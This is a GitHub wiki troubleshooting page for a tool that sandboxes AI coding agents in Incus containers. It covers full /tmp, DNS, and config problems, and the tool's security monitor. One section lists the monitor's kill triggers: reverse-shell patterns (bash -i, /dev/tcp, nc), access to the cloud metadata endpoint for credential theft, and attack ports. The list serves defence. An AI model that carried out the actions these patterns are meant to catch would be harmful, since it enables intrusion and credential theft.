Troubleshooting - mensfeld/code-on-incus GitHub Wiki

Agent Freezes Completely Mid-Task

Symptom: The agent stops producing output entirely — no error, no progress, just silence for minutes at a time. Often happens partway through npm install, a cargo build, running tests, or any operation that writes a lot of temporary data.

Cause: /tmp inside the container is full. /tmp is a tmpfs — a RAM-backed filesystem with a hard size cap. When it fills up the kernel returns ENOSPC to every process that tries to write. Most build tools (npm, cargo, pytest, TypeScript compilers, Docker) are not written to handle this gracefully — they freeze waiting for a write that will never succeed.

Common sources of large /tmp usage:

npm / yarn / pnpm — package tarballs and unpack staging
cargo — incremental compilation artefacts and linker inputs
Test runners — coverage reports, snapshots, JUnit XML output
tsc / Babel — intermediate .js files and source maps
Docker builds — layer staging and build context tarballs
sort, grep, awk on large datasets — write temp files to /tmp by default

Why Linux doesn't auto-clean it: Ubuntu's systemd-tmpfiles-clean.timer runs daily and only removes files older than 10 days. Nothing in a normal session ever ages out. There is no back-pressure mechanism — the kernel does not evict files when space runs low the way it pages out memory.

Diagnosis: From your host while the agent is running:

# Check how full /tmp is
incus exec <container-name> -- df -h /tmp

# Find the largest files/directories
incus exec <container-name> -- du -sh /tmp/* 2>/dev/null | sort -rh | head -20

Immediate fix (without restarting): Clear known large cache directories:

incus exec <container-name> -- find /tmp -maxdepth 1 -name 'npm-*' -exec rm -rf {} +
incus exec <container-name> -- find /tmp -maxdepth 1 -size +100M -delete

Permanent fix: Increase the /tmp size cap in your config (takes effect on next session start):

# ~/.coi/config.toml  or  .coi/config.toml in your project
[limits.disk]
tmpfs_size = "8GiB"   # default is "" (disk-backed, no size cap)

Alternative: Move TMPDIR onto disk instead of the RAM-backed tmpfs, avoiding the size limit entirely at the cost of slightly slower temp I/O:

# Add to your project's .claude.json or run at the start of the session
export TMPDIR=/workspace/.tmp
mkdir -p "$TMPDIR"

Note: /workspace/.tmp is on your host filesystem, so files persist after the session — add it to .gitignore and clean it up periodically.

COI's built-in protection (since v0.7.0):

/tmp defaults to the container's root virtual disk — no RAM cap, shares the storage pool
/etc/tmpfiles.d/coi-tmp-cleanup.conf in the base image removes files not accessed for 1 hour
systemd-tmpfiles-clean.timer overridden to run every 15 minutes so abandoned artefacts are reclaimed automatically
Optional RAM-backed tmpfs available by setting tmpfs_size = "4GiB" in [limits.disk]

DNS Issues During Build

Symptom: coi build hangs at "Still waiting for network..." even though the container has an IP address.

Cause: On Ubuntu systems with systemd-resolved, containers may receive 127.0.0.53 as their DNS server via DHCP. This is the host's stub resolver which only works on the host, not inside containers.

Automatic Fix: COI automatically detects and fixes this issue during build by:

Detecting if DNS resolution fails but IP connectivity works
Injecting public DNS servers (8.8.8.8, 8.8.4.4, 1.1.1.1) into the container
The resulting image uses static DNS configuration

Permanent Fix: Configure your Incus network to provide proper DNS to containers:

# Option 1: Enable managed DNS (recommended)
incus network set incusbr0 dns.mode managed

# Option 2: Use public DNS servers
incus network set incusbr0 raw.dnsmasq "dhcp-option=6,8.8.8.8,8.8.4.4"

After applying either fix, future containers will have working DNS automatically.

Note: The automatic fix only affects the built image. Other Incus containers on your system may still experience DNS issues until you apply the permanent fix.

Why doesn't COI automatically run incus network set for me?

COI deliberately uses an in-container fix rather than modifying your Incus network configuration:

System-level impact - Changing Incus network settings affects all containers on that bridge, not just COI containers
Network name varies - The bridge might not be named incusbr0 on all systems
Permissions - Users running coi build might not have permission to modify Incus network settings
Intentional configurations - Some users have custom DNS configurations for their other containers
Principle of least surprise - Modifying system-level Incus config without explicit consent could break other setups

The in-container approach is self-contained and only affects COI images, leaving your Incus configuration untouched.

Container Paused by Security Monitoring

Symptom: Your session suddenly freezes and coi list shows the container in "Frozen" state.

Cause: The security monitoring daemon detected a HIGH-severity threat and automatically paused the container to prevent potential data exfiltration or malicious activity.

Common triggers:

Large file read operations (>50MB) — could be legitimate if analyzing big files
Large file write operations (>50MB) — could be legitimate if creating archives
Suspicious process patterns that match known attack tools

Diagnosis:

# Check the audit log for what triggered the pause
cat ~/.coi/audit/<container-name>.jsonl

# Look for HIGH-level threats
cat ~/.coi/audit/<container-name>.jsonl | grep '"level":"high"'

Resolution:

If the activity was legitimate (e.g., you asked the AI to analyze a large codebase):

# Unfreeze the specific container
coi unfreeze <container-name>

# Or unfreeze all frozen COI containers
coi unfreeze

If you're unsure, review the audit log first. Look at the title, category, and evidence fields to understand what was detected.

Prevention:

For projects that legitimately need large file operations, increase the thresholds:

# ~/.coi/config.toml or .coi/config.toml
[monitoring]
file_read_threshold_mb = 200    # Increase from default 50MB

Note: Only increase thresholds if you understand the security implications. The defaults are set to catch most exfiltration attempts while allowing normal development work.

Container Killed by Security Monitoring

Symptom: Your session terminates unexpectedly and coi list shows no container for your workspace.

Cause: The security monitoring daemon detected a CRITICAL-severity threat and automatically killed the container to prevent malicious activity.

Common triggers:

Reverse shell patterns detected (bash -i, /dev/tcp, nc with suspicious flags)
Metadata endpoint access (169.254.169.254) — cloud credential theft attempt
Connection to known attack ports (4444, 5555, 31337)

Diagnosis:

# Check the audit log (persists after container is killed)
cat ~/.coi/audit/<container-name>.jsonl

# Look for CRITICAL-level threats
cat ~/.coi/audit/<container-name>.jsonl | grep '"level":"critical"'

Resolution:

CRITICAL threats are serious and typically indicate:

A prompt injection attack tricked the AI into malicious behavior
Malicious code in the project attempted to run
A false positive (rare, but possible)

Before starting a new session:

Review what the AI was doing when killed
Check if the project contains suspicious code
If it was a false positive, report it as an issue

Note: Unlike HIGH threats (pause), CRITICAL threats (kill) require starting a new session. This is intentional — the container state may be compromised.

Docker Compose Fails Inside Session Containers

Symptom: docker compose up or docker-compose commands fail inside containers started with coi shell. Docker itself may work fine, but Compose specifically errors out.

Cause: Docker support flags (security.nesting, security.syscalls.intercept.mknod, security.syscalls.intercept.setxattr) were not being set on session containers. This was a race condition where incus launch started the container before the configuration was applied.

Fix: This was fixed in COI. The container launch now uses a three-step sequence: incus init → configure flags → incus start, ensuring Docker support flags are always applied before the container starts. Update to the latest version of COI.

"Permission denied" or "I have no name!" in Container

Symptom: You see I have no name! as your shell prompt, or get Permission denied errors when accessing files like .bashrc inside the container.

Cause: The container's code user has a default UID/GID of 1000 baked into the base image, but your code_uid config is set to a different value. The mismatch means files owned by UID 1000 are inaccessible to the new UID.

Fix: COI now automatically remaps the container user's UID/GID when code_uid differs from the image default, running groupmod, usermod, and chown during session setup. Update to the latest version.

If you need to fix this manually for a persistent container:

incus exec <container-name> -- usermod -u <your-uid> code
incus exec <container-name> -- groupmod -g <your-uid> code
incus exec <container-name> -- chown -R <your-uid>:<your-uid> /home/code

Security Settings Silently Disabled

Symptom: Security features like block_private_networks, auto_pause_on_high, or auto_kill_on_critical appear to be disabled even though you have not explicitly turned them off.

Cause: In older versions, the multi-layer config merge (global → project → CLI) used plain bool fields. When a higher-priority config file omitted a boolean field, it defaulted to false and overwrote the true value from a lower-priority config. This meant security-critical defaults could be silently lost.

Fix: This was fixed by converting 13 boolean config fields to pointer types (*bool), so omitted fields are nil (no override) rather than false. Update to the latest version.

Verification: After updating, check that your security settings are applied:

coi health --verbose

Look for the Monitoring section to confirm auto_pause=true and other security settings.

Firewall Rules Accumulating (Thousands of Rules)

Symptom: sudo firewall-cmd --direct --get-all-rules shows hundreds or thousands of stale rules. System may slow down as firewalld processes a bloated ruleset.

Cause: This could happen when containers were killed via signals, coi shutdown was used without proper cleanup, or containers crashed. Older versions had paths where deferred firewall cleanup was skipped.

Fix: COI now cleans up firewall rules on all termination paths (normal exit, shutdown, kill, security responder auto-kill). To clean up existing stale rules:

# Dry run — see what would be cleaned
coi clean --orphans --dry-run

# Clean orphaned rules, zone bindings, and veth interfaces
coi clean --orphans

Prevention: Always stop containers via coi shutdown or coi kill rather than directly via incus stop/delete.

Settings.json Overwritten (Lost API Credentials)

Symptom: Your ~/.claude/settings.json is overwritten with sandbox/bypass settings after running coi shell. Custom settings like AWS Bedrock credentials, environment variables, or personal preferences are lost.

Cause: Older versions would overwrite the entire settings file with sandbox permissions rather than merging.

Fix: COI now performs a deep merge of settings, preserving your existing configuration while adding sandbox permissions. Your env variables, allowedTools, and other custom settings are preserved.

If your settings were already lost, restore from backup or recreate them. Going forward, updates should preserve your configuration.

Cross-Device Link Error When Saving Session

Symptom: Session save fails with EXDEV (cross-device link) error, typically when /tmp and the session storage directory are on different filesystems or mount points.

Fix: COI now uses a recursive copy with proper symlink handling as a fallback when os.Rename fails with EXDEV. Update to the latest version.

COI Refuses to Start: "security.privileged=true"

Symptom: coi shell, coi run, or coi build fails immediately with an error about security.privileged=true being detected.

Cause: The default Incus profile (or the container config) has security.privileged=true set. Privileged containers disable all container isolation — seccomp, AppArmor, and UID mapping are all bypassed. COI refuses to run in this configuration because it defeats the entire security model.

Fix:

# Remove the privileged setting from the default profile
incus profile unset default security.privileged

# Verify it's gone
incus profile get default security.privileged
# Should return empty or error (meaning it's unset — which is the safe default)

Verification:

coi health
# Should show:
#   [OK]   Privileged check  : Default profile uses unprivileged containers
#   [OK]   Security posture  : Full isolation — unprivileged containers with seccomp and AppArmor

Note: Incus containers are unprivileged by default. This setting is only present if someone explicitly set it. If you need privileged containers for other (non-COI) workloads, use a separate Incus profile rather than changing the default.

Kernel Version Warning on Startup

Symptom: coi shell, coi run, or coi build prints a warning on stderr about the host kernel being below 5.15.

Cause: Kernels older than 5.15 may lack security features (user namespaces, seccomp improvements, cgroup v2) that Incus relies on for safe container isolation. COI warns but does not block — containers will still start.

What to do:

If your system is running a recent distribution (Ubuntu 22.04+, Fedora 36+, Debian 12+), you likely already have kernel >= 5.15
If you see this warning, consider upgrading your kernel or distribution
The warning is informational — COI will continue to work, but isolation may be weaker on very old kernels